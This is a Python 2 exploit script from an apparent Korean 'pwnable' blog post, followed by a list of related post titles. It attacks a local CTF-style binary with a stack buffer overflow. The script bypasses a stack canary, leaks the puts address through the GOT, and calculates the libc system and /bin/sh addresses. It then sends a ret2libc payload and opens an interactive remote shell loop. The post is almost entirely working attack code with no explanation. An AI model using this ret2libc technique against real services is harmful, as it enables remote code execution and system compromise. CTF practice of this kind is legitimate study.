from socket import *
from struct import *
import time
#####################################
def until(s, string):
data=''
while string not in data:
data += s.recv(1)
return data
#####################################
p = lambda x : pack('<L',x)
up = lambda x : unpack('<L', x)
puts_plt = 0x08048540
puts_got = 0x08049ADC
puts_system = 158960
binsh_puts = 1055912
pr = 0x08048838
host = '127.0.0.1'
port = 8787
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, port))
payload = "0" * 33
payload += "A" * 292
payload += p(0x00)
payload += "A" * 4
payload += p(puts_plt)
payload += p(0x08048614)
payload += p(puts_got)
sock.send(payload+"\n")
print until(sock,"// Can you bypass the canary? ;p\n")
puts_addr = up(sock.recv(4))[0]
system_addr = puts_addr - puts_system
binsh_addr = puts_addr + binsh_puts
print "puts_addr = "+ hex(puts_addr)
print "system_addr = "+ hex(system_addr)
print "binsh_addr = "+hex(binsh_addr)
print "=========== Stage2 ==========="
print sock.recv(1024)
payload2 = "0" * 33
payload2 += "A" * 292
payload2 += p(0x00)
payload2 += "A" * 4
payload2 += p(system_addr)
payload2 += "A" * 4
payload2 += p(binsh_addr)
sock.send(payload2+"\n")
print until(sock,"// Can you bypass the canary? ;p\n")
while True:
cmd = raw_input('$ ')
sock.send(cmd+"\n")
print sock.recv(1024)
'pwnable' 카테고리의 다른 글
echo2 exploit only (0) | 2015.08.08 |
---|---|
Canary를 제외한 컴파일 (0) | 2015.07.27 |
echo exploit only (0) | 2015.07.24 |
64bit 인자 전달 방식 (0) | 2015.04.18 |
nc -e 옵션 (0) | 2015.03.22 |